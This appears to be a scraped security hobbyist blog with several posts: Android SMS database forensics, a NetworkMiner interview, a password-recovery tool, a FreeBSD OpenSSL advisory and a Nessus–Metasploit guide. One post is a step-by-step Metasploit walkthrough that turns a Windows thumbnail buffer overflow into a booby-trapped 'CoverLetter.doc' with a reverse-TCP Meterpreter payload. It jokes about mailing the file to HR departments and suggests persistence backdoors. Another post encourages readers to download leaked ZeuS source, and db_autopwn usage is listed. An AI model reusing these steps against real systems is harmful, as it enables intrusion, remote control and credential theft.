Hello all, I hope your year is going well so far; I just wanted to drop a line and mention that a few weeks ago I appeared on “Attack of the Androids” podcast esp 16. A little background about the podcast, the are a weekly audio podcast focused on the Google Android operating system and community.
You can find them on Google + or follow them on twitter @aotaradio kool cast check them out!
In light of all the CarrierIQ press I started wondering what 
others applications on my phone might be doing things that I am not aware of. So I installed SQLite Editor and started poking around my phone, that’s when I decided to see what my sms client “Handcent” was up too. Since I wanted to view my out on a bigger monitor I fired up a adb shell and used SQLite see what Handcent sms was hiding under the hood.
I used the following command to search my /data/data folder on my device to look for any files with a .db extension since that indicated it was a database file.
adb shell find /data -name *.db
As you can see I found several databases on my phone but today
we will be looking at one in particular. Handcent's "hc_sms.db".
F
or this part we will use sqlite to view the database layout (schema)
and its contents:sqlite> .schema
CREATE TABLE DELIVERY_REPORT (MESSAGE_ID INTEGER Primary KEY,TIMESTAMP text,UPDATE_TIMESTAMP text);CREATE TABLE SEND_LOG (ID Integer Primary KEY,SID INTEGER ,SEND_TYPE INTEGER,BEGIN_SEND_TIME text,END_SEND_TIME text,SEND_CONTENT TEXT,
SENDING_PERSON_NUBER INTEGER,SUCCESS_NUMBER INTEGER,FAIL_NUMBER INTEGER);CREATE TABLE SEND_LOG_DETAIL (SID INTEGER,PID INTEGER,BEGIN_SEND_TIME TEXT,END_SEND_TIME TEXT,PERSON_NAME TEXT,PERSON_NUMBER TEXT,SENDI
NG_MESSAGE_NUMBER INTEGER,SENT_SUCCESS_NUMBER INTEGER,SENT_FAIL_NUMBER INTEGER);
CREATE TABLE android_metadata (locale TEXT);sqlite> .tables
DELIVERY_REPORT SEND_LOG SEND_LOG_DETAIL android_metadata
sqlite>
And now after doing a select * from SEND_LOG; to my amazement
I saw all my text messages that were sent since I installed
the handcent application bothDELETEDand undeleted.
Also looking at select * from SEND_LOG_DETAIL I saw the same
information but this log also held the receiver of the sms name
and phone number.
Now my question is, if I am deleting a message and thinking
its being deleted why would handcent chose to keep a copy of
this message in an unencrypted database where anyone can access
it? I would love to hear from them and try to understand why
this is being done.
While sorting through my twitter feed yesterday I notice the following site and a informative article over at SCmagazine explaining the site’s purpose.
In short “A Sydney security researcher has developed a web portal that allows administrators to check if work email accounts have been compromised.
The portal, (https://shouldichangemypassword.com) allows users to search through databases of stolen email addresses collated by researcher Daniel Grzelak.”
Read more over at SCMagazine.com.
My first response to this was hmm, this would be a perfect place to harvest new email addresses as a spammer with every new query to the database. But as the site owner stated “The email you enter will NOT be stored, transmitted, or otherwise used beyond this check.”.
In the end I think this is a great resource, someone actually decided to do something useful with all the hacked data that are being leaked every week or so. I send the researcher a tweet requesting a feature to do a blind search on a domain name instead of just an email address, this way you can easily see if anyone in your organization has been compromise.
While checking my IRC and twitter stream this morning I notice some chatter surrounding a comment from a user by the name of @mikkohypponen on twitter mentioning that “Google provides the addresses of all of their 35,513, 445 user profiles” that’s about 35 million people.
You can verify this for yourself by visiting the provided URL http://bit.ly/iT6p3n or directly at https://ssl.gstatic.com/s2/sitemaps/profiles-sitemap.xml what you will see when you visit that link is a xml file listing all of the various profiles grouping. Just copy one of the links place it into your browser and you will then be taken to another site with the links to the actual profiles copy any of them into your browser an you will be a bit surprised.
Why should you care about this you might ask? Easy its only a matter of time before some creates a script to harvest all of the following:
For that you should be a bit concern but maybe Google is not. According to https://twitter.com/#!/tomokas he stated that he mentioned this to Google back in 2008 and only got an auto response email.
I recently came across a really interesting intro writeup on browser exploit packs. The research team installed and tested over 40 different packs and provided some really nice feedback, here is the link.
For anyone that is not familiar what an exploit packs is, here is a brief definition; “A browser exploit is a form of malicious code that takes advantage of a flaw or vulnerability in an operating system or piece of software with the intent to alter a user’s browser settings without their knowledge. Malicious code may exploit ActiveX, HTML, images, Java, JavaScript, and other Web technologies and cause the browser to run arbitrary code.”
The infamous ZeuS or zbot Trojan has made a name for itself in this arena. Even though zbot does not directly exploit any system vulnerability however it is very successful when it comes to infecting its victim. Zeus, which until recently was being sold on the underground black market for anywhere from $5,000-$10,000 or even more; because of this it was hard for the average guy to get his hands on a copy to review the source code.
Well not until a few days ago that is, now if you do a search for “Download the ZeuS Source Code”, you will come across several sites that are hosting a leaked copy of “Zeus 2.0.8.9″, and from the looks of things its a fully loaded copy. With that said grab your copy, turn on your VM’s and let the learning begin.
Links:
https://secure.wikimedia.org/wikipedia/en/wiki/Browser_exploit
http://www.mdl4.com/2011/05/download-zeus-source-code/
Now while reading about exploit pack I started wondering how I can get myself a copy without having to spend
NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows. NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/reassemble transmitted files and certificates from PCAP files.
Now that we have the explanation out of the way, I would like to really start by saying how excited I was when I saw an announcement on the Pauldotcom mailing list about version 1.0 being released. I have been using this tool for a while after being introduced to it on an episode of hak5 a while back, and since then its been one of my favorite applicatioin of choice for parsing PCAP files and looking for goodies.
This new release has lots of new features to keep you busy for a while:
You can read the complete change-log here for more details here.
If that is not enough to make you want to try this application out, I don’t know what else is. I fired-up version 1.0 for a few mins before writing this article and I was pretty impressed with my results. I was able to quickly and easily harvest all images browsed from my PC, IRC chat logs, identify key information about hosts on my network (ports, OS type, service version numbers) and much more without needing to run a noisy port scanner.
Q&A with Main developer of NetworkMiner
Question: What was the purpose behind developing NetworkMiner?
Answer: I started developing NetworkMiner back in 2006 while I was working with SCADA security for a major electric utility company in Europe. My idea was to give network admins and process control engineers a view of what hosts that are actually on the network as opposed to what their documentation said. The reason for building a passive sniffer instead of yet another port scanner was that SCADA and process control networks tend not to handle port scans very well, and I sure didn’t
wanna bring down the network of a running plant!
Q: How many core developers are involved with this project?
A: I’m the only developer of NetworkMiner.
Q: Which group of individuals do you think can benefit mostly from this application (Forensics investigators, pentesters, network admins, etc)?
A: NetworkMiner today is primarily designed for computer security incident responders and law enforcement who need to do forensic analysis of network traffic.
Q: How long has version 1.0 been in development?
A: I’ve been working on the 1.0 release of NetworkMiner since June 2010. The last three months before the release were spent on testing and validating the release. I also have a beta testing group,
consisting of talented network forensics professionals, who have provided additional validation of the release.
Q: What key features would you like highlight in this release; free as well as the paid version.
A: Some of the major improvements are:
In addition to whats listed about, the Professional version of NetworkMiner also includes a protocol identification feature, which can identify what application layer protocol that is being used in order to apply the appropriate protocol parser. This means that running an FTP or web server on a non-standard port will not be sufficient to fool NetworkMiner Professional.
You can also export the results from the various tabs in NetworkMiner Professional into a CSV file that can be opened with Excel or OpenOffice. The Professional release also includes a command line version of NetworkMiner, which comes in very handy when you need to wrap the pcap parsing functionality into a shell script or an automatized environment for traffic analysis.
Q: Are there any plans to make a Nix version of this application?
A: I have plans to look further into Mono (http://www.mono-project.com ) to build cross-platform support for NetworkMiner, but implementing new features have to this date had higher priority for me. It is, however, possible to run NetworkMiner from Linux by using Wine already today.
Q: What is the recommended deployment strategy to properly maximize NetworkMiner’s potential (GB nic, dual nic, physical vs vmware guest etc)?
A: My recommendation for achieving reliable and fast traffic capture solution is to use a physical FreeBSD machine running dumpcap for traffic capture. You can then open the pcap files from dumpcap with NetworkMiner for analysis on a Windows machine. When analyzing malware I actually recommend running NetworkMiner on a virtualized Windows machine without any network support, in order to minimize the risk of spreading the malware. NetworkMiner does not use much RAM, but can be fairly CPU and disk intensive. So make sure you have a fast processor and an HDD with fast access times and high write speed.
Q: If someone wants to learn more about this application, provide feedback or report bugs what’s the best way to go about this?
A: The best way to learn more about NetworkMiner is to follow my blog on http://www.netresec.com/?page=Blog .Feedback in the form of for example help or feature requests can be posted
to SourceForge on http://sourceforge.net/projects/networkminer/support
You can download NetworkMiner from any of the following urls,so go get your copy and start to spread the word:
http://www.netresec.com/?page=NetworkMiner
http://sourceforge.net/projects/networkminer/
http://networkminer.sourceforge.net/
I must give a special THANK You to Erik Hjelmvik, developer of NetworkMiner for taking time out of his busy week to help us understand a little bit more about this awesome project.
On January 11, the guys over at http://securityxploded.com release Google Password Decryptor version 3.0, and for anyone who have not tried this tool out before or have never heard about it; I urge you to download and give it a shot you will be surprised.
GooglePasswordDecryptor is the FREE software to instantly recover stored Google account passwords by various Google applications as well as popular web browsers and messengers. Most of the Google’s desktop applications such as GTalk, Picassa etc store the Google account passwords to prevent hassale of entering the password everytime for the user. Even the web browsers and messengers store the login passwords including Google account passwords in an encrypted format. GooglePasswordDecryptor automatically crawls through each of these applications and recovers the encrypted Google account password in clear text.
Google uses the single centralized account for managing all of its services such as Gmail, Picassa, GTalk, iGoogle, Desktop Search etc. Since all of these core services are controlled by one account, losing the password will easily make one’s life miserable. Also trying the Google password recovery service will turn out to be useless unless you have setup the secondary account for receiving the password and you remember all the personal details that you have entered at the time of account creation. In such situation GooglePasswordDecryptor helps in recovering your Google password from any of the supported applications.
Current version supports password recovery from second line browsers such as Safari & Flock . It also presents the command line interface which is more helpful for Penetration testers in their work. Apart from normal users who can use it to recover their lost password, it can come in handy for Forensic officials in their investigation.
GooglePasswordDecryptor supports recovering of the stored Google account password from most of the prominent Google desktop applications, popular internet browsers and messengers. Here is the complete list of supported applications.
Read more over at the http://securityxploded.com/googlepassworddecryptor.php
I downloaded this app, and ran the portable version and to my surprise it was able to pull the credentials from my Pidgin Messenger and Google Picassa application.
Time to think of a new approach for using these apps!
With the new year usually brings hope for new changes however it seems to be the same old story with Microsoft. First advisory of the year and already you have to sit around waiting for MS to release a patch. Todays blog posting is based on the new Vulnerability in Graphics Rendering Engine . The guys over at www.metasploit.com has created a working exploit module for this that I was testing and it seem to be working as stated.
According to the note in the module, This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.
The vulnerability is exploited via malicious thumbnail images that may be attached to various documents (e.g. Microsoft Office documents). The most likely exploit vector would use e-mail attachments. However, it is also possible to use network shares.
There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious once). See the Microsoft advisory for details.
Affected Platforms:
All current versions of Windows, with the exception of Windows 7 and 2008 R2, are vulnerable.
Mitigation:
There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious once). See the Microsoft advisory for details.
Test Lab Setup:
Steps Taken:
msf exploit(ms11_xxx_createsizeddibsection) > set FILENAME CoverLetter.doc
FILENAME => CoverLetter.doc
msf exploit(ms11_xxx_createsizeddibsection) > set OUTPUTPATH opt/metasploit3/msf3/data/exploits
OUTPUTPATH => /opt/metasploit3/msf3/data/exploits
Choosing your Payload: I decided to go with the meterpreter
msf exploit(ms11_xxx_createsizeddibsection) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
Setting up your local host (host you want victim to reverse connect too):
msf exploit(ms11_xxx_createsizeddibsection) > set LHOST 192.168.19.129
LHOST => 192.168.19.129
msf exploit(ms11_xxx_createsizeddibsection) > set LPORT 4545
LPORT => 4545
Next issue the command exploit to create your malicious file:
msf exploit(ms11_xxx_createsizeddibsection) > exploit
[*] Creating ‘CoverLetter.doc’ file …
[*] Generated output file /opt/metasploit3/msf3/data/exploits/CoverLetter.doc
Next we need to setup our reverse handler to listen on port 4545 for any incoming connections once our victim views/open our specially crafter file. We can take this resume file and blast it out to HR departments across the net and just sit back and wait for them to connect back home 
.
msf exploit(ms11_xxx_createsizeddibsection) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.19.129
LHOST => 192.168.19.129
msf exploit(handler) > set LPORT 4545
LPORT => 4545
msf exploit(handler) > exploit
Now once our victim views the file in a thumbnail view, or opens it you should see something like this:
[*] Started reverse handler on 192.168.19.129:4545
[*] Starting the payload handler…
[*] Sending stage (749056 bytes) to 192.168.19.147
[*] Meterpreter session 1 opened (192.168.19.129:4545 -> 192.168.19.147:1591) at Tue Jan 04 20:39:40 -0500 2011
From here you can jump into a shell on the system by issuing the “shell” command, or setup a Persistence Meterpreter backdoor as shown by Carlos, or start Capturing Windows Logons with Smartlocker basically sky’s the limit……Have fun hacking something.
Refernce links:
https://www.microsoft.com/technet/security/advisory/2490606.mspx
http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html
http://isc.sans.edu/diary.html?storyid=10201
I noticed an email this morning mentioned a openssl issue that affects the FreeBSD platform and I wanted to mention it again in case anyone missed it when it came out yesterday.
I just patched my system according to the steps in the advisory and I will report back if I experience any issues after patching.
I. Background
FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is
a collaborative effort to develop a robust, commercial-grade, full-featured
Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as a full-strength
general purpose cryptography library.II. Problem Description
A race condition exists in the OpenSSL TLS server extension code
parsing when used in a multi-threaded application, which uses
OpenSSL’s internal caching mechanism. The race condition can lead to
a buffer overflow. [CVE-2010-3864]A double free exists in the SSL client ECDH handling code, when
processing specially crafted public keys with invalid prime
numbers. [CVE-2010-2939]III. Impact
For affected server applications, an attacker may be able to utilize
the buffer overflow to crash the application or potentially run
arbitrary code with the privileges of the application. [CVE-2010-3864].It may be possible to cause a DoS or potentially execute arbitrary in
the context of the user connection to a malicious SSL server.
[CVE-2010-2939]IV. Workaround
No workaround is available, but CVE-2010-3864 only affects FreeBSD 8.0
and later.It should also be noted that CVE-2010-3864 affects neither the Apache
HTTP server nor Stunnel.V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to 7-STABLE or 8-STABLE, or to the
RELENG_8_1, RELENG_8_0, RELENG_7_3, or RELENG_7_1 security branch
dated after the correction date.2) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to FreeBSD 7.1, 7.3,
8.0 and 8.1 systems.a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.[FreeBSD 7.x]
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl7.patch
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl7.patch.asc[FreeBSD 8.x]
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl.patch
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl.patch.ascb) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libssl
# make obj && make depend && make && make installNOTE: On the amd64 platform, the above procedure will not update the
lib32 (i386 compatibility) libraries. On amd64 systems where the i386
compatibility libraries are used, the operating system should instead
be recompiled as described in
<URL:http://www.FreeBSD.org/handbook/makeworld.html>3) To update your vulnerable system via a binary patch:
Systems running 7.1-RELEASE, 7.3-RELEASE, 8.0-RELEASE or 8.1-RELEASE
on the i386 or amd64 platforms can be updated via the
freebsd-update(8) utility:# freebsd-update fetch
# freebsd-update installVI. Correction details
The following list contains the revision numbers of each file that was
corrected in FreeBSD.
Links:
http://www.freebsd.org/security/advisories.html
http://security.freebsd.org/advisories/FreeBSD-SA-10:10.openssl.asc
Show notes for Linux Basix podcast:
Discussion Links:
News: http://www.wired.com/threatlevel/2010/09/zeus-botnet-ring/
Zeus botnet ring: Thirty-seven people are being charged in the U.S. for their alleged role in an international fraud ring based in East Europe that stole more than $3 million from bank accounts belonging primarily to small businesses and municipalities, according to indictments released Thursday.
The sophisticated ring included a multitude of East Europeans who entered the U.S. on student visas and fake passports to operate as so-called “money mules,” laundering funds stolen from U.S. accounts and sending the money overseas.
Bye Bye Bios: New PCs could start in just seconds, thanks to an update to one of the oldest parts of desktop computers.The upgrade will spell the end for the 25-year-old PC start-up software known as Bios that initialises a machine so its operating system can get going.
The code was not intended to live nearly this long, and adapting it to modern PCs is one reason they take as long as they do to warm up. Bios’ replacement, known as UEFI, will predominate in new PCs by 2011.The acronym stands for Unified Extensible Firmware Interface and is designed to be more flexible than its venerable predecessor.
News: http://www.wired.com/gadgetlab/2010/09/data-collection-android/
Data collection Andriod:Something as simple as changing your Android phone’s wallpaper or downloading a ringtone could transmit personal data about you, including your location, without your knowledge.
Sound farfetched? It’s not: About 15 of 30 randomly selected, popular, free Android apps sent sent users’ private information to remote advertising servers and two-thirds of the apps handled data in ambiguous
ways, say researchers.
News: http://www.informationweek.com/news/government/security/showArticle.jhtml?articleID=227500797
DHS Launches Cyber Attack Exercise:For three or four days this week, the Internet will come under a virtual attack from an unknown adversary, and it will be up to the government and private sector’s coordinated efforts to root out the cause and work together to keep systems up and running — at least within the simulated confines of the Department of Homeland Security’s Cyber Storm III exercise, which begins Tuesday.
The Cyber Storm series of exercises simulates large cyber attacks on critical infrastructure and government IT assets in order to test the government’s preparedness. Specifically, this year’s exercise will be the first time DHS will test both the draft National Cyber Incident Response Plan (an effort to provide a coordinated response to major cybersecurity incidents) that will be publicly released later this year and the new National Cybersecurity and Communications Integration Center (the hub of DHS’ cybersecurity coordination efforts).
Tech segment: “Nessus Bridge for Metasploit ”
The idea for this segment and a future blog post that I will be releasing tomorrow with an interview from the author,came about from a posting I saw on twitter this week. After reading the author’s site I said to myself this is some “prety cool stuff”
Basic Idea:
The general concept is to allow you to do various tasks with your Nessus server, from within the msf command line. By that I mean scan with Nessus, review the results, import the results and then exploit the results.
Below is the current and future list of feature that the author is currently developing:
Checkout his blog and keep an eye on this project –> http://blog.zate.org
What do you need to start testing:
Once you have the above criteria met, log into your Nessus server via the web interface and create your test policy. From this point onwards you can log-out of your server and close your web browser.
Next do the following:
1- Load up your Metasploit console via /pentest/exploit/framework3/msfconsole
2- Ensure you have the most updated version “svn up”
3- Load the nessus module “load nessus”
4- Connect to your nessus server with “nessus_connect user@myhost:8834 ok”
5- Next start your first scan with “nessus_scan_new <policy id> <scan name> <targets>”
6- While running you can issues “nessus_scan_status” to view when its completed
7- Next you can need to get your report ID with the following command “nessus_report_list”
8- Create db workspace and import scanned results “db_connect” then “nessus_report_get <report id>”
9- Choose a report ID number and use the following to view the details so you can see if your host has any high risk vulnerability to exploit with MSF “nessus_report_hosts <report id>” .
From here on you can issue the db_autopwn commands and have fun:
Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
Go out and have some fun,and look for my follow-up post tomorrow.
Alibi3col theme by 
Themocracy
